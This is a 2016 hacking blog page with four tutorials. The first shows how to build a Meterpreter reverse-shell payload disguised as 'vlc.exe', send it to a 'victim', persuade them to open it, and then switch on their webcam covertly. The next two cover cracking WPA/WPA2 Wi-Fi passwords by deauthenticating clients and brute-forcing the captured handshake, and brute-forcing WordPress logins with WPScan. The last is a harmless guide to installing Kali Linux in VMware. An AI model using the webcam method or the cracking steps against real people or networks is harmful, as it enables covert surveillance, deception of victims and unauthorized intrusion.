Friday, June 17, 2016

HOW TO HACK ANY WEB CAM OF REMOTE COMPUTER WITH KALI LINUX

HOW TO HACK ANY WEB CAM OF REMOTE COMPUTER

Hello guys in this tutorial you will learn how to hack any Web Cam of remote Computer. As I think many of the user definitely wants to know about how to hack of the WebCam of remote Computer. So my friends in tutorial you definitely find your ans. In this tutorial what I can do I am using a backtrack as an attacker System to create a Payload and send this Payload to the Victim which is Windows7. Now it demo time how these work..
Note :- This Payload works on windows 2000, XP, Vista, Win 7.
Step 1 :- First open terminal in linux and write the following codes to create a Payload.
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.128 R | msfencode -t exe -c 15 >vlc.rxe
By Performing above Step our Payload is successfully encoded and creates in root directory of backtrack.
Step 2 :- Now we used to open a msfconsole for that go to..
Applications – BackTrack – Exploitation Tools – Network Exploitation Tools – Metasploit Framework –
msfconsole
Step 3 :- Now the msfconsole is open in front of you then at that console we set some basic command.
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
(here “PAYLOAD” means the code or exploit which is actually runs on the victim machine after exploitation is successfully works and “windows” is represent the victim machine and“meterpreter” is used to open the meterpreter session of windows and “reverse_tcp” is use to connect back to attacker machine to victim machine)
set LHOST 192.168.1.128 (this is a ip address of attacker machine i.e the
ip of my backtrack, you can use ifconfig command to view the ip address of backtrack)
set LPORT 4444 (this is a local port where the victim system connect back to the attacker system)
exploit

Step 4 :- In  our exploit is running successfully and wait for the victim. Now we copy that exploit and send to the victim and request him/her to click/open the exploit.

After clicking the vlc.exe exploit on victim system, then we successfully got a meterpreter sessions opened.
Now its time to do hack a webcam of remote system by using webcam command.
Step 5 :- run webcam
After running above command the webcam of the victim machine is now start to run, to view thewebcam snap of
victim go to root directory of backtrack and open a webcam.htm file and continue press refresh button or F5.

Thursday, June 16, 2016

How To Hack WPA/WPA2 Wi-Fi With Kali Linux & Aircrack-ng

Kali Linux can be used for many things, but it probably is best known for its ability to penetration test, or “hack,” WPA and WPA2 networks. There are hundreds of Windows applications that claim they can hack WPA; don’t get them! They’re just scams, used by professional hackers, to lure newbie or wannabe hackers into getting hacked themselves. There is only one way that hackers get into your network, and that is with a Linux-based OS, a wireless card capable of monitor mode, and aircrack-ng or similar. Also note that, even with these tools, Wi-Fi cracking is not for beginners. Playing with it requires basic knowledge of how WPA authentication works, and moderate familiarity with Kali Linux and its tools. If you feel you have the necessary skills, let’s begin:
These are things that you’ll need:
If you have these then roll up your sleeves and let’s see how secure your network is!
          Important notice: Hacking into anyone’s Wi-Fi without permission is considered an illegal act or crime in most countries. We are performing this tutorial for the sake of penetration testing, hacking to become more secure, and are using our own test network and router.
By reading and/or using the information below, you are agreeing to ourDisclaimer

Step One:
Start Kali Linux and login, preferably as root.
Step 1
Step Two:
Plugin your injection-capable wireless adapter, (Unless your native computer wireless card supports it). If you’re using Kali in VMware, then you might have to connect the card via the imageicon in the device menu.
Step Three:
Disconnect from all wireless networks, open a Terminal, and type airmon-ng
Step 3
This will list all of the wireless cards that support monitor (not injection) mode. If no cards are listed, try disconnecting and reconnecting the adapter (if you’re using one) and check that it supports monitor mode. If you’re not using an external adapter, and you still don’t see anything listed, then your card doesn’t support monitor mode, and you’ll have to purchase an external one (see the link in the requirements). You can see here that my card supports monitor mode and that it’s listed as wlan0.
Step Four:
Type airmon-ng start followed by the interface name of your wireless card. mine is wlan0, so my command would be: airmon-ng start wlan0
Step 4
The “(monitor mode enabled)” message means that the card has successfully been put into monitor mode. Note the name of the new monitor interface, mon0.

EDIT:A bug recently discovered in Kali Linux makes airmon-ng set the channel as a fixed “-1” when you first enable mon0. If you receive this error, or simply do not want to take the chance, follow these steps after enabling mon0:
Type: ifconfig [interface of wireless card] down and hit Enter.
Replace [interface of wireless card] with the name of the interface that you enabled mon0 on; probably called wlan0. This disables the wireless card from connecting to the internet, allowing it to focus on monitor mode instead.
After you have disabled mon0 (completed the wireless section of the tutorial), you’ll need to enable wlan0 (or name of wireless interface), by typing: ifconfig [interface of wireless card] up and pressing Enter.


Step Five:

Type airodump-ng followed by the name of the new monitor interface, which is probablymon0.
Step 5
If you receive a “fixed channel –1” error, see the Edit above.
Step Six:
Airodump will now list all of the wireless networks in your area, and a lot of useful information about them. Locate your network or the network that you have permission to penetration test. Once you’ve spotted your network on the ever-populating list, hit Ctrl + C on your keyboard to stop the process. Note the channel of your target network.
step 6

Step Seven:
Copy the BSSID of the target network
Step 7
Now type this command:
airodump-ng -c [channel] --bssid [bssid] -w /root/Desktop/ [monitor interface]Replace [channel] with the channel of your target network. Paste the network BSSID where [bssid] is, and replace [monitor interface] with the name of your monitor-enabled interface, (mon0). The “–w” and file path command specifies a place where airodump will save any intercepted 4-way handshakes (necessary to crack the password). Here we saved it to the Desktop, but you can save it anywhere.

A complete command should look similar this:
airodump-ng -c 10 --bssid 00:14:BF:E0:E8:D5 -w /root/Desktop/ mon0
image
Now press enter.
Step Eight:
Airodump with now monitor only the target network, allowing us to capture more specific information about it. What we’re really doing now is waiting for a device to connect or reconnect to the network, forcing the router to send out the four-way handshake that we need to capture in order to crack the password.
Also, four files should show up on your desktop, this is where the handshake will be saved when captured, so don’t delete them!
But we’re not really going to wait for a device to connect, no, that’s not what impatient hackers do. We’re actually going to use another cool-tool that belongs to the aircrack suite called aireplay-ng, to speed up the process. Instead of waiting for a device to connect, hackers can use this tool to force a device to reconnect by sending deauthentication (deauth) packets to one of the networks devices, making it think that it has to reconnect with the network.
Of course, in order for this tool to work, there has to be someone else connected to the network first, so watch the airodump-ng and wait for a client to show up. It might take a long time, or it might only take a second before the first one shows. If none show up after a lengthy wait, then the network might be empty right now, or you’re to far away from the network.

You can see in this picture, that a client has appeared on our network, allowing us to start the next step.
Step 8
Step Nine:
Leave airodump-ng running and open a second terminal. In this terminal, type this command:
aireplay-ng –0 2 –a [router bssid] –c [client bssid] mon0The –0 is a short cut for the deauth mode and the 2 is the number of deauth packets to send.
-a indicates the access point/router’s BSSID, replace [router bssid] with the BSSID of the target network, which in my case, is 00:14:BF:E0:E8:D5.
-c indicates the client’s BSSID, the device we’re trying to deauth, noted in the previous picture. Replace the [client bssid] with the BSSID of the connected client, this will be listed under “STATION.”
And of course, mon0 merely means the monitor interface, change it if yours is different.
My complete command looks like this:
aireplay-ng –0 2 –a 00:14:BF:E0:E8:D5 –c 4C:EB:42:59:DE:31 mon0
Step 9
Step Ten:
Upon hitting Enter, you’ll see aireplay-ng send the packets. If you were close enough to the target client, and the deauthentication process works, this message will appear on the airodump screen (which you left open):
image
step 10
This means that the handshake has been captured, the password is in the hacker’s hands, in some form or another. You can close the aireplay-ng terminal and hit Ctrl + C on the airodump-ng terminal to stop monitoring the network, but don’t close it yet just incase you need some of the information later.
If you didn’t receive the “handshake message,” then something went wrong in the process of sending the packets. Unfortunately, a variety of things can go wrong. You might just be too far away, and all you need to do is move closer. The device you’re attempting to deauth might not be set to automatically reconnect, in which case you’ll either have to try another device, or leave airodump on indefinitely until someone or something connects to the network. If you’revery close to the network, you could try a WiFi spoofing tool like wifi-honey, to try to fool the device into thinking that you’re the router. However, keep in mind that this requires that you be significantly closer to the device than the router itself. So unless you happen to be in your victim’s house, this is not recommended.
Do note that, despite your best efforts, there are many WPA networks that simply can’t be cracked by these tools. The network could be empty, or the password could be 64 characters long, etc.
Step 11:
This concludes the external part of this tutorial. From now on, the process is entirely between your computer, and those four files on your Desktop. Actually, it’s the .cap one, that is important. Open a new Terminal, and type in this command:
aircrack-ng -a2 -b [router bssid] -w [path to wordlist] /root/Desktop/*.cap
-a is the method aircrack will use to crack the handshake, 2=WPA method.
-b stands for bssid, replace [router bssid] with the BSSID of the target router, mine is 00:14:BF:E0:E8:D5.
-w stands for wordlist, replace [path to wordlist] with the path to a wordlist that you have downloaded. I have a wordlist called “wpa.txt” in the root folder.
/root/Desktop/*.cap is the path to the .cap file containing the password. The means wild card in Linux, and since I’m assuming that there are no other .cap files on your Desktop, this should work fine the way it is.
My complete command looks like this:
aircrack-ng –a2 –b 00:14:BF:E0:E8:D5 –w /root/wpa.txt  /root/Desktop/*.cap
image
Now press Enter.
Step 12:
Aircrack-ng will now launch into the process of cracking the password. However, it will only crack it if the password happens to be in the wordlist that you’ve selected. Sometimes, it’s not. If this is the case, you can try other wordlists. If you simply cannot find the password no matter how many wordlists you try, then it appears your penetration test has failed, and the network is at least safe from basic brute-force attacks.
Cracking the password might take a long time depending on the size of the wordlist. Mine went very quickly.
If the phrase is in the wordlist, then aircrack-ng will show it too you like this:

image
The passphrase to our test-network was “notsecure,” and you can see here that it was in the wordlist, and aircrack found it.
If you find the password without a decent struggle, then change your password, if it’s your network. If you’re penetration testing for someone, then tell them to change their password as soon as possible.

Wednesday, June 15, 2016

Kali Linux Tutorial: How To Brute Force Wordpress Using Wpscan Tool

Kali-linux-brute-force-wordpress-wpscan- picateshackz.com

As a WordPress administrator or webmaster you are responsible for the security of the WordPress blog or website you manage. Most probably you’ve already done a lot to beef up the security and today we will show you how to brute force Wordpress password in Kali Linux using Wpscan to checking your Password Strength.

Disclaimer: This tutorial is for educational purposes only and we are NOT responsible in any way for how this information is used, use it at your own risk.



As we now WPScan is a black box WordPress vulnerability scanner, and it is installed by default in kali linux we will use it for brute forcing wordpress, If you have no idea about Kali Linux then i recommend you to read this article: An Introduction To Hacker’s OS: Kali Linux Setup Tutorial.

We will use our wordpress platform that we already installed in our kali linux. If you have not already done visit our article: Complete Guide To Setup Wordpress In Kali Linux With Xampp Server .



Lets's start,


  • Open your Kali Linux Terminal and start Xampp server by typing the following command:
 root@kali: /opt/lampp/lampp start

  • Now we need to Enumerate users, type in terminal:
 root@kali: wpscan -u 127.0.0.1/wordpress --enumerate u

Kali-linux-brute-force-wordpress-wpscan- picateshackz.com

  • Wpscan will automatically search the admin username.


Kali-linux-brute-force-wordpress-wpscan- picateshackz.com

  • Now Do wordlist password brute force on the username, type in terminal:

 root@kali: wpscan --url 127.0.0.1/wordpress --wordlist /root/pass --username k4linux

Kali-linux-brute-force-wordpress-wpscan- picateshackz.com

  • --wordlist set the location of your Password Wordlist

  • --username set the administrator username that you have found


Kali-linux-brute-force-wordpress-wpscan- picateshackz.com


After a search Wpscan will find the password and this will take a few minutes, this depends on your Wordlist.

Efficiency of the Brute Force depend on how much strong is your wordlist and how many password contains it.

Watch the video tutorial for more explanation (Wpscan):





Recommended Hacking Tutorial:

Visit TechyChronicles For More Method To Earn Money Online

Visit ApksBlizzard For More Apks

How to Install Kali Linux 2.0 Sana in VMware Workstation

This step-by-step article shows you how to install Kali Linux 2.0 in VMware Workstation step-by-step but you can also use VMware Player which is free. This tutorial also helps if you install Kali Linux 2.0 on physical hardware. In fact, Kali Linux 2.0 installation is not very hard. First of all, why Kali as a virtual machine? Because, if you are new on Kali, it is very safe to use it as virtual machine. You can easily explore Kali Linux 2.0 new features without damaging any live data on your computer.
VMware workstation and VMware Player are virtualization software at the desktop level. They allow to run multiple virtual machines on a physical machine. You can visit VMware product page for more information about the latest release for VMware Workstation and VMware Player.
Update: You can also watch Install Kali Linux 2 in VMware Workstation 12 Step-by-Step in 10 Minutes Video below or keep continue reading the article.

Kali Linux 2.0 Installation Steps in VMware Workstation


1. Download Kali Linux 2 Sana ISO 64 bit and save it on your computer.
Kali Linux 2.0 Download ISOKali Linux 2.0 Download ISO

2. Open VMware Workstation and click Create a New Virtual Machine.
Install Kali Linux 2.0 in VMware Workstation
3. I will go with the Custom installation in this tutorial, because it gives more options.
Install Kali Linux 2 Sana in VMware Workstation 11 Step 2
4. Click Next at Virtual Machine Hardware Compatibility.Install Kali Linux 2 Sana in VMware Workstation 11 Step 3
5. Browse your Kali Linux 2 Sana ISO file.
Install Kali Linux 2 Sana in VMware Workstation 11 Choose ISO
6. Choose Linux as a Guest Operating System and choose Debian 7.x 64-bit version. (If you downloaded Kali Linux 32 bit edition, you should choose Debian 7.x
Install Kali Linux 2 Sana in VMware Workstation 11 OS Version Selection
7. Write the name of your virtual machine.
Install Kali Linux 2 Sana in VMware Workstation 11 Choose Name
8. Specify how many processors and cores you wanna give to this virtual machine. Default is okay but I want my virtual machine more powerful. So, I give 1 processor and 4 cores.
Install Kali Linux 2 Sana in VMware Workstation 11 CPU Configuration
9. Set how much memory you want to give to this Kali Linux virtual machine. I give 2GB of RAM in this tutorial. You can adjust this value according to your physical resources and/or your needs.
Install Kali Linux 2 Sana in VMware Workstation 11 RAM
10. Select Use bridged networking. Virtual machine can access to an Ethernet network directly.
Install Kali Linux 2 Sana in VMware Workstation 11 Networking
11. Simply click Next at the Select I/O Controller Types section. LSI Logic is recommended for the most cases.
Install Kali Linux 2 Sana in VMware Workstation 11 Controller Type
12. Click Next to continue at Select a Disk Type section.
Install Kali Linux 2 Sana in VMware Workstation 11 Disk Type
13. Click Next to create a new virtual disk for your virtual machine.
Install Kali Linux 2 Sana in VMware Workstation 11 Configure Disk
14. Set disk space you want to use. I set it as 60 GB. I also clicked Store virtual disk as a single file option.
Install Kali Linux 2 Sana in VMware Workstation 11 Disk Size
15. Click Next at this screen.
Install Kali Linux 2 Sana in VMware Workstation 11 Step 14

16. Click Finish

Install Kali Linux 2 Sana in VMware Workstation 11 Step 15

17. Now, click Power on this virtual machine.

Install Kali Linux 2.0 in VMware Workstation Power on VM


18. Choose Graphical install.

Install Kali Linux 2 Sana in VMware Workstation 11

19. Select your Operating System language.

Install Kali Linux 2 Sana Operating System language

20. Select your location .

Install Kali Linux 2 Sana Select Location

21. Select your keyboard layout.

Install Kali Linux 2 Sana Keyboard Layout

22. Give a name for your Kali Linux 2.

Install Kali Linux 2 Sana Hostname


23. Click Continue on Configure the network screen.

Install Kali Linux 2 Sana in VMware Workstation 11

24. Set up root user password here and then Click Continue. You will login into Kali Linux 2 with this password after installation done.

Install Kali Linux 2 Sana Set Root Password

25. Choose Guided – use entire disk option and then click Continue. It is safe to use whole disk because it is virtual disk.

Install Kali Linux 2 Sana Configure Disks

26. Click Continue at Partition disks screen.

Install Kali Linux 2 Sana Disk Partitioning

27. Choose All files in one partition (recommended for new users).

Install Kali Linux 2 Sana in VMware Workstation 11


 28. Select Finish partitioning and write changes to disk.

Install Kali Linux 2 Sana in VMware Workstation 11 Write Changes to Disk

29. Select Yes to write the changes to disk.
Install Kali Linux 2 Sana in VMware Workstation 11 Write Changes to Disk


30. Wait until the installer finishes its job. It may take 5-10 minutes.

Install Kali Linux 2 Sana in VMware Workstation 11

31. Choose Yes to configure the package manager so that a network mirror can be used for any available updates.Install Kali Linux 2 Sana Configure Package Manager

32. Go with the defaults.

Install Kali Linux 2 Sana Configure Package Manager

33. Choose Yes to install the GRUB boot loader on your virtual hard disk. This is very important step, otherwise your vm will not boot up.
Install Kali Linux 2 Sana GRUB Boot Loader

34. Choose /dev/sda on which GRUB will be installed.

Install Kali Linux 2 Sana GRUB Boot Loader

35. Click Continue at the Finish the installation screen. Your vm will be restarted shortly.

Install Kali Linux 2 Sana in VMware Workstation 11

36. Choose Kali GNU/Linux or just wait.

Kali Linux 2 Sana Boot Screen

37. Login to your Kali Linux 2 virtual machine with root user and password which you have set in previous steps.

Kali Linux 2 Sana Welcome Screen

Kali Linux 2 Sana in VMware Workstation 11

Congratulations, you’ve just installed Kali Linux 2.0 in VMware Workstation as a virtual machine. After the installation, I recommend you to install VMware Tools for better performance and usability. If you want to install VMware Tools, Please Wait For Our Next Tutorial Happy hacking!!
I hope this article is helpful for you. If you liked it or found useful, feel free to like or share it.